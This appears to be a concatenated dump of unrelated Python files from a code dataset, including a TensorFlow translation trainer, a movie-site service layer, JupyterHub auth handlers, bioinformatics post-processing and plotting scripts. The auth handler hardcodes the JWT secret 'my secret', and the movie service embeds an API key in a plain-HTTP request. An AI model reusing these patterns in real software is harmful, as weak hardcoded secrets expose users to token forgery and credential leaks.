= client.info()\n log.info(\"Connected to docker daemon\\tdriver=%s\\tkernel=%s\", info[\"Driver\"], info[\"KernelVersion\"])\n except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as error:\n raise BadDockerConnection(base_url=options['base_url'], error=error)\n return client\n\ndef main(argv=None):\n try:\n args, cli_args = CliParser().interpret_args(argv)\n handler = setup_logging(verbose=args.verbose, silent=args.silent, debug=args.debug)\n Overview(configuration_file=args.harpoon_config.name, logging_handler=handler).start(cli_args)\n except DelfickError as error:\n print(\"\")\n print(\"!\" * 80)\n print(\"Something went wrong! -- {0}\".format(error.__class__.__name__))\n print(\"\\t{0}\".format(error))\n if CliParser().parse_args(argv)[0].debug:\n raise\n sys.exit(1)\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n pass\n\n","sub_path":"harpoon/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":9091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"22383077","text":"# coding: utf-8\nimport tensorflow as tf \nfrom batch import MakeDataset, MakeSrcTrgDataset\n\nSRC_TRAIN_DATA = '../data/train.en'\nTRG_TRAIN_DATA = '../data/train.zh'\n\nCHECKPOINT_PATH = '../log/'\n\nHIDDEN_SIZE = 1024\nNUM_LAYERS = 2\nSRC_VOCAB_SIZE = 10000\nTRG_VOCAB_SIZE = 4000\nBATCH_SIZE = 100\nNUM_EPOCH = 5\nKEEP_PROB = 0.8\nMAX_GRAD_NORM = 5\nSHARE_EMB_SOFTMAX = True\n\nclass NMTModel(object):\n\t\"\"\"docstring for NMTModel\"\"\"\n\tdef __init__(self):\n\n\t\t''' Define the encoder and decoder \n\t\t'''\n\t\tself.enc_cell = tf.nn.rnn_cell.MultiRNNCell(\n\t\t\t[tf.nn.rnn_cell.BasicLSTMCell(HIDDEN_SIZE) for _ in range(NUM_LAYERS)])\n\t\tself.dec_cell = tf.nn.rnn_cell.MultiRNNCell(\n\t\t\t[tf.nn.rnn_cell.BasicLSTMCell(HIDDEN_SIZE) for _ in range(NUM_LAYERS)])\n\n\t\t''' Define word embeddings of the source and target language\n\t\t'''\n\t\tself.src_embedding = tf.get_variable('src_emb', [SRC_VOCAB_SIZE, HIDDEN_SIZE])\n\t\tself.trg_embedding = tf.get_variable('trg_emb', [TRG_VOCAB_SIZE, HIDDEN_SIZE])\n\n\t\t''' Define the softmax layer vars\n\t\t'''\n\t\tif SHARE_EMB_SOFTMAX:\n\t\t\tself.softmax_weight = tf.transpose(self.trg_embedding)\n\t\telse:\n\t\t\tself.softmax_weight = tf.get_variable(\"weight\", [HIDDEN_SIZE, TRG_VOCAB_SIZE])\n\t\tself.softmax_bias = tf.get_variable(\"softmax_bias\", [TRG_VOCAB_SIZE])\n\n\t# def test(self, a):\n\t# \tprint(a)\n\n\t''' Construct the forward compute graph\n\t'''\n\tdef forward(self, src_input, src_size, trg_input, trg_label, trg_size):\n\t\tbatch_size = tf.shape(src_input)[0]\n\n\t\t''' Get source and target input word embeddings\n\t\t'''\n\t\t# convert the src_input and trg_input to embeddings\n\t\tsrc_emb = tf.nn.embedding_lookup(self.src_embedding, src_input)\n\t\ttrg_emb = tf.nn.embedding_lookup(self.trg_embedding, trg_input)\n\n\t\t# apply dropout on word embeddings\n\t\tsrc_emb = tf.nn.dropout(src_emb, KEEP_PROB)\n\t\ttrg_emb = tf.nn.dropout(trg_emb, KEEP_PROB)\n\n\t\t''' Encoder - use dynamic_rnn\n\t\t\tenc_outputs: [batch_size, max_time, HIDDEN_SIZE]\n\t\t\tenc_state: a tuple contains #NUM_LAYERS LSTMStateTuple classes. dims: [batch_size, state_size]\n\t\t'''\n\t\twith tf.variable_scope(\"encoder\"):\n\t\t\tenc_outputs, enc_state = tf.nn.dynamic_rnn(self.enc_cell, src_emb, src_size, dtype = tf.float32)\n\n\t\t''' Decoder - use dynamic_rnn\n\t\t\tdec_outputs: [batch_size, max_time, HIDDEN_SIZE]\n\t\t'''\t\n\t\twith tf.variable_scope(\"decoder\"):\n\t\t\tdec_outputs, _ = tf.nn.dynamic_rnn(self.dec_cell, trg_emb, trg_size, initial_state = enc_state)\n\n\t\t''' Compute log perplexity each time step\n\t\t''' \n\t\toutput = tf.reshape(dec_outputs, [-1, HIDDEN_SIZE])\n\t\tlogits = tf.matmul(output, self.softmax_weight) + self.softmax_bias\n\t\tloss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels = tf.reshape(trg_label, [-1]), logits = logits)\n\n\t\t# When compute the avg cost\n\t\t# set the padding position weight be 0\n\t\tlabel_weights = tf.sequence_mask(trg_size, maxlen = tf.shape(trg_label)[1], dtype = tf.float32)\n\t\tlabel_weights = tf.reshape(label_weights, [-1])\n\t\tcost = tf.reduce_sum(loss * label_weights)\n\t\tcost_per_token = cost / tf.reduce_sum(label_weights)\n\n\t\t''' Define BP\n\t\t'''\n\t\ttrainable_variables = tf.trainable_variables()\n\t\t# control grads; define opt; define train_op\n\t\tgrads = tf.gradients(cost / tf.to_float(batch_size), trainable_variables)\n\t\tgrads, _ = tf.clip_by_global_norm(grads, MAX_GRAD_NORM)\n\t\toptimizer = tf.train.GradientDescentOptimizer(learning_rate = 1.0)\n\t\ttrain_op = optimizer.apply_gradients(zip(grads, trainable_variables))\n\t\treturn cost_per_token, train_op\n\n''' Train an epoch and return global steps\n\tsave a checkpoint every 200 steps\n''' \ndef run_epoch(session, cost_op, train_op, saver, step):\n\twhile True:\n\t\ttry:\n\t\t\tcost, _ = session.run([cost_op, train_op])\n\t\t\tif step % 10 == 0:\n\t\t\t\tprint(\"After %d steps, per token cost is %.3f\" % (step, cost))\n\t\t\tif step % 200 == 0:\n\t\t\t\tsaver.save(session, CHECKPOINT_PATH, global_step = step)\n\t\t\tstep += 1\n\t\texcept tf.errors.OutOfRangeError:\n\t\t\tbreak\n\treturn step\n\ndef main():\n\tinitializer = tf.random_uniform_initializer(-0.05, 0.05)\n\n\t''' Define the training model\n\t''' \n\twith tf.variable_scope(\"nmt_model\", reuse = None, initializer = initializer):\n\t\ttrain_model = NMTModel()\n\t''' Define the input data\n\t''' \n\tdata = MakeSrcTrgDataset(SRC_TRAIN_DATA, TRG_TRAIN_DATA, BATCH_SIZE)\n\titerator = data.make_initializable_iterator()\n\t(src, src_size), (trg_input, trg_label, trg_size) = iterator.get_next()\n\n\t# Define forward compute graph\n\tcost_op, train_op = train_model.forward(src, src_size, trg_input, trg_label, trg_size)\n\n\t# Train model\n\tsaver = tf.train.Saver()\n\tstep = 0\n\twith tf.Session() as sess:\n\t\ttf.global_variables_initializer().run()\n\t\tfor i in range(NUM_EPOCH):\n\t\t\tprint(\"In iteration: %d\" % (i + 1))\n\t\t\tsess.run(iterator.initializer)\n\t\t\tstep = run_epoch(sess, cost_op, train_op, saver, step)\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"seq2seq/model/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"650633521","text":"from typing import List, Iterable\nimport requests\nfrom flix.adapters.repository import AbstractRepository\nfrom flix.domain.model import Movie, Actor, User, Review, Director, Genre, Comment, make_genre_association, make_comment\n\n\nclass NonExistentMovieException(Exception):\n pass\n\n\nclass UnknownUserException(Exception):\n pass\n\n\ndef add_comment(movie_rank: int, comment_text: str, username: str, repo: AbstractRepository):\n # Check that the movie exists.\n movie = repo.get_movie(movie_rank)\n if movie is None:\n raise NonExistentMovieException\n\n user = repo.get_user(username)\n if user is None:\n user = User(\"Guest account\", \"Abcd1234\")\n\n # Create comment.\n comment = make_comment(comment_text, user, movie)\n\n # Update the repository.\n repo.add_comment(comment)\n\n\ndef get_movie(movie_rank: int, repo: AbstractRepository):\n movie = repo.get_movie(movie_rank)\n\n if movie is None:\n raise NonExistentMovieException\n\n return movie_to_dict(movie, repo)\n\n\ndef get_first_movie(repo: AbstractRepository):\n\n movie = repo.get_first_movie()\n\n return movie_to_dict(movie, repo)\n\n\ndef get_last_movie(repo: AbstractRepository):\n\n movie = repo.get_last_movie()\n return movie_to_dict(movie, repo)\n\n\ndef get_movies_by_year(date, repo: AbstractRepository):\n # Returns movies for the target date (empty if no matches), the date of the previous movie (might be null), the date of the next movie (might be null)\n\n movies = repo.get_movies_by_year(target_year=date)\n\n movies_dto = list()\n prev_year = next_year = None\n\n if len(movies) > 0:\n prev_year = repo.get_year_of_previous_movie(movies[0])\n next_year = repo.get_year_of_next_movie(movies[0])\n\n # Convert Movies to dictionary form.\n movies_dto = movies_to_dict(movies, repo)\n\n return movies_dto, prev_year, next_year\n\n\ndef get_movie_ranks_for_genre(genre_name, repo: AbstractRepository):\n movie_ranks = repo.get_movie_ranks_for_genre(genre_name)\n\n return movie_ranks\n\ndef get_movie_ranks_for_actor(actor_name, repo: AbstractRepository):\n movie_ranks = repo.get_movie_ranks_for_actor(actor_name)\n\n return movie_ranks\n\ndef get_movie_ranks_for_director(director_name, repo: AbstractRepository):\n movie_ranks = repo.get_movie_ranks_for_director(director_name)\n\n return movie_ranks\n\n\ndef get_movie_ranks_for_year(tgt_year, repo: AbstractRepository):\n movie_ranks = repo.get_movie_ranks_for_year(tgt_year)\n\n return movie_ranks\n\n\ndef get_movies_by_rank(rank_list, repo: AbstractRepository):\n movies = repo.get_movies_by_rank(rank_list)\n\n # Convert Movies to dictionary form.\n movies_as_dict = movies_to_dict(movies, repo)\n\n return movies_as_dict\n\n\ndef get_comments_for_movie(movie_rank, repo: AbstractRepository):\n movie = repo.get_movie(movie_rank)\n\n if movie is None:\n raise NonExistentMovieException\n\n return comments_to_dict(movie.comments)\n\n\n# ============================================\n# Functions to convert model entities to dicts\n# ============================================\n\ndef movie_to_dict(movie: Movie, repo: AbstractRepository):\n '''actors = movie.actors[0]\n for i in movie.actors[1:]:\n actors += \",\"\n actors += str(i)'''\n actors = movie.actors\n\n movie_detail = requests.get(f\"http://omdbapi.com?t={movie.title}&apikey=47f211b2\").text\n #print(movie_detail)\n try:\n img_link = movie_detail.split('\",\"')[13].split('\":\"')[1]\n except:\n img_link = \"static/movie.png\"\n movie.image_hyperlink = img_link\n try:\n d = movie.director.director_full_name\n director = movie.director\n except:\n director = Director(movie.director)\n try:\n genres = movie.genres.split(',')\n except:\n genres = movie.genres\n\n movie_dict = {\n 'rank': movie.rank,\n 'date': movie.date,\n 'title': movie.title,\n 'first_para': movie.description,\n 'hyperlink': movie.hyperlink,\n 'image_hyperlink': movie.image_hyperlink,\n 'comments': comments_to_dict(movie.comments),\n 'genres': genres_to_dict(genres, repo),\n 'rating': movie.rating,\n 'votes': movie.votes,\n 'metascore': movie.metascore,\n 'director': director,\n 'actors': actors,\n 'runtime_minutes': movie.runtime_minutes,\n 'revenue': movie.revenue\n }\n return movie_dict\n\n\ndef movies_to_dict(movies: Iterable[Movie], repo:AbstractRepository):\n return [movie_to_dict(movie, repo) for movie in movies]\n\n\ndef comment_to_dict(comment: Comment):\n comment_dict = {\n 'username': comment.user.username,\n 'movie_rank': comment.movie.rank,\n 'comment_text': comment.comment,\n 'timestamp': comment.timestamp\n }\n return comment_dict\n\n\ndef comments_to_dict(comments: Iterable[Comment]):\n return [comment_to_dict(comment) for comment in comments]\n\n\ndef genre_to_dict(genre: Genre, repo: AbstractRepository):\n genre_dict = {\n 'name': genre,\n 'genre_asso_movies': [movie.rank for movie in repo.get_movies() if genre in movie.genres]\n }\n return genre_dict\n\ndef director_to_dict(director: Director):\n director_dict = {\n 'name': director.director_full_name,\n 'director_asso_movies': [movie.rank for movie in director.director_asso_movies]\n }\n return director_dict\n\ndef actor_to_dict(actor: Actor):\n actor_dict = {\n 'name': actor,\n 'actor_asso_movies': [movie.rank for movie in actor.actor_asso_movies]\n }\n return actor_dict\n\n\ndef genres_to_dict(genres: Iterable[Genre], repo:AbstractRepository):\n return [genre_to_dict(genre, repo) for genre in genres]\n\ndef directors_to_dict(directors: Iterable[Director]):\n return [director_to_dict(director) for director in directors]\n\ndef actors_to_dict(actors: Iterable[Actor]):\n return [actor_to_dict(actor) for actor in actors]\n\n# ============================================\n# Functions to convert dicts to model entities\n# ============================================\n\ndef dict_to_movie(dict):\n movie = Movie(dict.rank, dict.date, dict.title, dict.first_para, dict.hyperlink)\n # Note there's no comments or genres.\n return movie\n\ndef set_rating(movie_id: int, rating: int, username: str, repo: AbstractRepository):\n user = repo.get_user(username)\n if user is None:\n user = User('Guest account', 'defaultpass')\n\n movie = repo.get_movie(movie_id)\n if movie is None:\n raise NonExistentMovieException\n\n repo.set_rating(rating, user, movie)\n\n","sub_path":"flix/feed/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":6550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"463930258","text":"\"\"\"Authorization handlers\"\"\"\n\n# Copyright (c) Jupyter Development Team.\n# Distributed under the terms of the Modified BSD License.\n\nimport json\nfrom urllib.parse import quote\n\nfrom tornado import web\nfrom .. import orm\nfrom ..utils import token_authenticated\nfrom .base import APIHandler\n\nimport jwt\n\n\nclass TokenAPIHandler(APIHandler):\n @token_authenticated\n def get(self, token):\n orm_token = orm.APIToken.find(self.db, token)\n if orm_token is None:\n raise web.HTTPError(404)\n self.write(json.dumps(self.user_model(self.users[orm_token.user])))\n\n\nclass CookieAPIHandler(APIHandler):\n @token_authenticated\n def get(self, cookie_name, cookie_value=None):\n cookie_name = quote(cookie_name, safe='')\n if cookie_value is None:\n self.log.warn(\"Cookie values in request body is deprecated, use `/cookie_name/cookie_value`\")\n cookie_value = self.request.body\n else:\n cookie_value = cookie_value.encode('utf8')\n user = self._user_for_cookie(cookie_name, cookie_value)\n if user is None:\n raise web.HTTPError(404)\n self.write(json.dumps(self.user_model(user)))\n\n\nclass JWTAPIHandler(APIHandler):\n SECRET = 'my secret'\n @token_authenticated\n def get(self):\n header = self.request.headers.get('Authorization', '')\n header = header.strip()\n if header:\n split_header = header.split(' ')\n if len(split_header) == 2 and split_header[0] == 'Bearer' and split_header[1]:\n try:\n decoded_token = jwt.decode(split_header[1], self.SECRET, options={'verify_iat': False})\n user = self._user_from_orm(decoded_token['sub'])\n if user is None:\n raise web.HTTPError(404)\n else:\n self.write(json.dumps(self.user_model(user)))\n except Exception:\n raise web.HTTPError(401)\n\n\ndefault_handlers = [\n (r\"/api/authorizations/cookie/([^/]+)(?:/([^/]+))?\", CookieAPIHandler),\n (r\"/api/authorizations/token/([^/]+)\", TokenAPIHandler),\n (r\"/api/authorizations/jwt/([^/]+)\", TokenAPIHandler)\n]\n","sub_path":"jupyterhub/apihandlers/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"364274528","text":"import numpy as np\nimport tensorflow as tf\nimport pandas as pd\n\n\nclass DatasetProducer(object):\n def __init__(self, batch_size, num_steps):\n self.batch_size = batch_size\n self.num_steps = num_steps\n\n def producer(self):\n data_path = '../data/399300.csv'\n data = pd.read_csv(data_path, encoding='GBK')\n\n data = data['涨跌幅'][-2::-1].values.astype(np.float32)\n\n train_data = dict()\n train_data['features'] = np.reshape(data[:3300], (33, self.num_steps, 1))\n train_data['labels'] = np.reshape(data[1:3301], (33, self.num_steps, 1))\n\n test_data = dict()\n test_data['features'] = np.reshape(data[3323:-1], (self.batch_size, self.num_steps, 1))\n test_data['labels'] = np.reshape(data[3324:], (self.batch_size, self.num_steps, 1))\n\n train_dataset = tf.contrib.data.Dataset.from_tensor_slices(train_data)\n test_dataset = tf.contrib.data.Dataset.from_tensor_slices(test_data).batch(self.batch_size)\n\n train_dataset = train_dataset.shuffle(10).batch(self.batch_size).repeat()\n\n return train_dataset, test_dataset\n","sub_path":"reader/dataset_producer.py","file_name":"dataset_producer.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"108656889","text":"with open(\"14-input.txt\", \"r\") as f:\n lines = f.readlines()\n\ntotal = 0\nused_addresses = []\nlines.reverse()\nnew_lines = []\n\n# remove duplicate registers so that only the latter are used\nfor line in lines:\n if line.split()[0] == \"mask\":\n new_lines.append(line)\n else:\n address = (line[line.find(\"[\") + 1:line.find(\"]\")])\n if address not in used_addresses:\n used_addresses.append(address)\n new_lines.append(line)\n\nnew_lines.reverse()\n\nfor line in new_lines:\n if line.split()[0] == \"mask\":\n mask = line.split()[-1]\n mask = \"\".join(reversed(mask))\n else:\n value = int(line.split()[-1])\n reversed_binary_value = \"\".join(reversed(bin(value)[2:]))\n used_addresses.append(address)\n for i in range(len(mask)):\n if mask[i] == \"X\":\n continue\n if i >= len(reversed_binary_value):\n if mask[i] == \"1\":\n value += 2 ** i\n elif mask[i] != reversed_binary_value[i]:\n if mask[i] == \"1\":\n value += 2 ** i\n else:\n value -= 2 ** i\n total += value\n\nprint(total)\n","sub_path":"14-1.py","file_name":"14-1.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"418963157","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 13 10:57:53 2020\n\n@author: jaydeep\n\"\"\"\nimport pandas as pd\nimport csv\nimport numpy as np\nfrom collections import defaultdict\nfrom matplotlib import pyplot as plt\n\nfiles = [\n# \"61883_ioallocatecomplete_1.bpl.bpl\",\n# \"ppa3x_nsremovelockmnremove_0.bpl.bpl\",\n# \"mp_iobuildfsdirpsignaleventincompletiontimeout_0.bpl.bpl\",\n \"sbp2port_irqldispatch_1.bpl.bpl\"\n# \"flpydisk_irqlexapclte1_1.bpl.bpl\"\n ]\n\nprint(files)\n\nfolders = [\"OR\",\"UW\",\"alpha10\",\"alpha50\",\"alpha90\",\"Union\",\"Intersection\"]\nfolders = [\"OR\",\"AlphaDecay0.055_2\"]\nqueryType = [\"ORQ\",\"UWQ\"]\n\n\n\n''' \nFile Wise z3 Query OR/UW\nUPDATE MAX VALUE\n'''\nmaxValue = 99999\nfor file in files:\n for folder in folders: \n _ = plt.figure()\n mem_file = folder + \"/\" + file + \"_stats.txt\"\n yQueryTimeOR = []\n yQueryTimeUW = []\n xOR = []\n xUW = []\n data = open(mem_file,'r')\n index = 0\n for line in data:\n arr = line.split(',')[:-1]\n mode = -1;\n for item in arr:\n if mode == -1:\n if \"UWQ\" in item:\n mode = 1\n elif \"ORQ\" in item:\n mode = 2\n else:\n index = index + 1\n if mode == 1:\n try:\n time = float(item)\n if time > maxValue:\n yQueryTimeUW.append(maxValue)\n xUW.append(index)\n else:\n yQueryTimeUW.append(time)\n xUW.append(index)\n except:\n continue\n elif mode == 2:\n try:\n time = float(item) \n if time > maxValue:\n yQueryTimeOR.append(maxValue)\n xOR.append(index)\n else:\n yQueryTimeOR.append(time)\n xOR.append(index)\n except:\n continue\n mode = -1\n plt.plot(xOR, yQueryTimeOR, label = \"ORQ \" + folder)\n plt.plot(xUW, yQueryTimeUW, label = \"UWQ \" + folder)\n plt.xlabel('Iterations')\n plt.ylabel('z3 Query Time (sec)')\n plt.legend()\n plt.title(file)\n plt.savefig(file + \"_\" + folder + \"_z3QueryTime.png\",dpi=200)\n \n''' \nFile Wise Inlined callsites UW/OR \n'''\n\nfor file in files:\n for folder in folders:\n _ = plt.figure()\n mem_file = folder + \"/\" + file + \"_stats.txt\"\n y = []\n yInlinedCallsitesOR = []\n yInlinedCallsitesUW = []\n xOR = []\n xUW = []\n index = 0\n data = open(mem_file,'r')\n for line in data:\n arr = line.split(',')\n mode = -1;\n try:\n sites = int(arr[-1])\n index = index + 1\n if \"ORQ\" in arr[-3]:\n yInlinedCallsitesOR.append(sites)\n xOR.append(index)\n elif \"UWQ\" in arr[-3]:\n yInlinedCallsitesUW.append(sites)\n xUW.append(index)\n except:\n continue\n plt.plot(xOR, yInlinedCallsitesOR, label = \"OR Inlined \" + folder)\n plt.plot(xUW, yInlinedCallsitesUW, label = \"UW Inlined \" + folder)\n plt.xlabel('Iterations')\n plt.ylabel('Number of inlined callsites')\n plt.legend()\n plt.title(file)\n plt.savefig(file + \"_\" + folder + \"_inlinedCallsites.png\",dpi=200)\n\n'''\n\n\n''' \n#File Wise z3 Query OR/UW in single file\n'''\n\nfor file in files:\n for folder in folders:\n _ = plt.figure()\n mem_file = folder + \"/\" + file + \"_stats.txt\"\n y = []\n yQueryTimeOR = []\n yQueryTimeUW = []\n data = open(mem_file,'r')\n for line in data:\n arr = line.split(',')[:-1]\n mode = -1;\n for item in arr:\n if mode == -1:\n if \"UWQ\" in item:\n mode = 1\n elif \"ORQ\" in item:\n mode = 2\n else:\n if mode == 1:\n try:\n yQueryTimeUW.append(float(item))\n except:\n continue\n elif mode == 2:\n try:\n yQueryTimeOR.append(float(item))\n except:\n continue\n mode = -1\n xOR = [i for i in range(0, len(yQueryTimeOR))]\n xUW = [i for i in range(0, len(yQueryTimeUW))]\n plt.plot(xOR, yQueryTimeOR, label = \"ORQ\")\n plt.plot(xUW, yQueryTimeUW, label = \"UWQ\")\n plt.xlabel('Time')\n plt.ylabel('z3 Query Time (sec)')\n plt.legend()\n plt.title(file)\n plt.savefig(file + \"_\" + folder + \"_z3QueryTime.png\",dpi=200)\n\n''' \n#File Wise z3 Query \n'''\nfor file in files:\n _ = plt.figure()\n for folder in folders:\n mem_file = folder + \"/\" + file + \"_stats.txt\"\n y = []\n data = open(mem_file,'r')\n idx = 0\n for line in data:\n arr = line.split(',')[:-1]\n for item in arr:\n try:\n time = float(item)\n maxValue = 10\n if time > maxValue:\n y.append(maxValue)\n else:\n y.append(time)\n except:\n continue\n x = [i for i in range(0, len(y))]\n plt.plot(x, y, label = folder)\n plt.xlabel('Time')\n plt.ylabel('z3 Query Time (sec)')\n plt.legend()\n plt.title(file)\n plt.savefig(file + \"_z3QueryTime.png\",dpi=200)\n\n''' \n#File Wise Inlined callsites UW/OR in single file\n'''\n\nfor file in files:\n for folder in folders:\n _ = plt.figure()\n mem_file = folder + \"/\" + file + \"_stats.txt\"\n y = []\n yInlinedCallsitesOR = []\n yInlinedCallsitesUW = []\n data = open(mem_file,'r')\n itr = 0\n for line in data:\n arr = line.split(',')\n itr = itr + 1\n mode = -1;\n try:\n if \"ORQ\" in arr[-3]:\n yInlinedCallsitesOR.append(int(arr[-1]))\n elif \"UWQ\" in arr[-3]:\n yInlinedCallsitesUW.append(int(arr[-1]))\n except:\n continue\n xOR = [i for i in range(0, len(yInlinedCallsitesOR))]\n xUW = [i for i in range(0, len(yInlinedCallsitesUW))]\n plt.plot(xOR, yInlinedCallsitesOR, label = \"OR Inlined\")\n plt.plot(xUW, yInlinedCallsitesUW, label = \"UW Inlined\")\n plt.xlabel('Iterations')\n plt.ylabel('Number of inlined callsites')\n plt.legend()\n plt.title(file)\n plt.savefig(file + \"_\" + folder + \"_inlinedCallsites.png\",dpi=200)\n\n''' \n#File Wise Inlined callsites\n'''\nfor file in files:\n _ = plt.figure()\n for folder in folders:\n mem_file = folder + \"/\" + file + \"_stats.txt\"\n y = []\n data = open(mem_file,'r')\n idx = 0\n for line in data:\n try:\n y.append(float(line.split(',')[-1]))\n except:\n continue\n x = [i for i in range(0, len(y))]\n plt.plot(x, y, label = folder)\n plt.xlabel('Iterations')\n plt.ylabel('Number of inlined callsites')\n plt.legend()\n plt.title(file)\n plt.savefig(file + \"_inlinedCallsites.png\",dpi=200)\n\n\n'''","sub_path":"alphadecay/Run9_AlphaGood_stats/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":7872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"623960034","text":"from tkinter import *\nfrom PIL import ImageTk,Image\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nroot=Tk()\nroot.title(\"Learn to code\")\nroot.iconbitmap('f:iron.ico')\nroot.geometry(\"400x200\")\n\ndef graph():\n house_prices=np.random.normal(200000,25000,5000)\n plt.pie(house_prices)\n plt.show()\n\nb=Button(root,text=\"Graph it\",command=graph)\nb.pack()\n\n\n\n\n\n\n\nroot.mainloop()","sub_path":"plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"69017722","text":"from com.harrison.pubsub.example.PubSubImpl import PubSubImpl\nfrom com.harrison.pubsub.example.StringData import StringData\n\ntest1 = PubSubImpl(\"test 1\")\n\nabc = \"Hello World\"\n\ntest2 = PubSubImpl(\"test 2\")\n\ntest1.subscribe(str)\ntest2.subscribe(abc)\n\nsd = StringData(\"This is some data\")\n\ntest1.subscribe(StringData)\ntest2.subscribe(sd)\n\ntest1.publish(abc)\ntest2.publish(sd)\n","sub_path":"com/harrison/pubsub/example/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"579120972","text":"import os\nimport sys\nimport subprocess\nsys.path.append(snakemake.config['args']['mcc_path'])\nimport scripts.mccutils as mccutils\nimport config.retroseq.retroseq_post as config\n\n\ndef main():\n mccutils.log(\"retroseq\",\"processing RetroSeq results\")\n retroseq_out = snakemake.input.retroseq_out\n\n out_dir = snakemake.params.out_dir\n ref_name = snakemake.params.ref_name\n sample_name = snakemake.params.sample_name\n chromosomes = snakemake.params.chromosomes.split(\",\")\n\n insertions = read_insertions(retroseq_out, sample_name, chromosomes, support_threshold=config.READ_SUPPORT_THRESHOLD, breakpoint_threshold=config.BREAKPOINT_CONFIDENCE_THRESHOLD)\n if len(insertions) >= 1:\n insertions = mccutils.make_redundant_bed(insertions, sample_name, out_dir, method=\"retroseq\")\n mccutils.make_nonredundant_bed(insertions, sample_name, out_dir, method=\"retroseq\")\n else:\n mccutils.run_command([\"touch\",out_dir+\"/\"+sample_name+\"_retroseq_redundant.bed\"])\n mccutils.run_command([\"touch\",out_dir+\"/\"+sample_name+\"_retroseq_nonredundant.bed\"])\n mccutils.log(\"retroseq\",\"RetroSeq post processing complete\")\n\ndef read_insertions(retroseq_vcf, sample_name, chromosomes, support_threshold=0, breakpoint_threshold=6):\n insertions = []\n\n with open(retroseq_vcf, \"r\") as vcf:\n for line in vcf:\n if \"#\" not in line:\n insert = mccutils.Insertion()\n line = line.replace(\":\",\"\\t\")\n line = line.replace(\"=\", \"\\t\")\n line = line.replace(\",\", \"\\t\")\n split_line = line.split(\"\\t\")\n insert.chromosome = split_line[0]\n insert.start = int(split_line[10])\n insert.end = int(split_line[11])\n insert.retroseq.read_support = int(split_line[6])\n insert.type = \"non-reference\"\n insert.name = split_line[9]+\"_non-reference_\"+sample_name+\"_retroseq_rp_\"\n insert.retroseq.breakpoint_confidence = int(split_line[22])\n\n if insert.retroseq.read_support >= support_threshold and insert.retroseq.breakpoint_confidence >= breakpoint_threshold and insert.chromosome in chromosomes:\n insertions.append(insert)\n \n return insertions\n\n\nif __name__ == \"__main__\": \n main()","sub_path":"scripts/retroseq/retroseq_post.py","file_name":"retroseq_post.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"189442538","text":"from models.HGSL.layers import *\nimport torch.nn as nn\n\n\nclass HGSL(nn.Module):\n \"\"\"\n Decode neighbors of input graph.\n \"\"\"\n\n def __init__(self, args, nfeat, nclass, dev):\n super(HGSL, self).__init__()\n # self.GCN = GCN_Backup(nfeat, args.num_hidden, nclass, dropout=args.dropout)\n self.GCN = GCN(nfeat, args.num_hidden, nclass, dropout=args.dropout)\n self.GenAdjLayer = HGSL_AdjGenerator(nfeat, args.num_hidden, args.num_head, args.epsilon, dev)\n self.lambda_ = args.lambda_\n self.eta = args.eta\n\n def forward(self, x, h, adj_ori, adj_feat, mode, norm_graph_reg_loss):\n \"\"\"\n\n Args:\n x: input feature\n h: embedding\n adj_ori: adj of graph\n adj_feat: adj generated by feature\n mode: gen adj using 'feat' or 'emb'\n Returns:\n logits: predicted labels\n h: embedding generated by GCN\n adj_sim:\n adj_agg:\n\n \"\"\"\n # ! Generate adj\n if mode == 'feat':\n adj_sim = self.GenAdjLayer(x, mode='feat')\n if norm_graph_reg_loss > 0:\n adj_sim = F.normalize(adj_sim, dim=1, p=1) # Row normalization\n adj_agg = self.lambda_ * adj_ori + (1 - self.lambda_) * adj_sim\n else:\n adj_agg = F.normalize(adj_sim, dim=1, p=1) # Row normalization\n adj_agg = self.lambda_ * adj_ori + (1 - self.lambda_) * adj_agg\n elif mode == 'emb':\n adj_sim = self.GenAdjLayer(h, mode='emb')\n if norm_graph_reg_loss > 0:\n adj_sim = F.normalize(adj_sim, dim=1, p=1) # Row normalization\n adj_agg = self.lambda_ * adj_ori + (1 - self.lambda_) * adj_sim\n else:\n adj_agg = F.normalize(adj_sim, dim=1, p=1) # Row normalization\n adj_agg = self.lambda_ * adj_ori + (1 - self.lambda_) * adj_agg\n # combine feat and emb sim mat\n adj_agg = self.eta * adj_agg + (1 - self.eta) * adj_feat\n\n # ! Aggregate using adj_agg\n logits, h = self.GCN(x, adj_agg)\n return logits, h, adj_sim, adj_agg\n\n\nclass GCN(nn.Module):\n def __init__(self, nfeat, nhid, nclass, dropout):\n super(GCN, self).__init__()\n self.gc1 = GraphConvolution(nfeat, nhid)\n self.gc2 = GraphConvolution(nhid, nclass)\n self.dropout = dropout\n\n def forward(self, x, adj):\n x = F.relu(self.gc1(x, adj))\n emb = x.detach()\n x = F.dropout(x, self.dropout, training=self.training)\n x = self.gc2(x, adj)\n 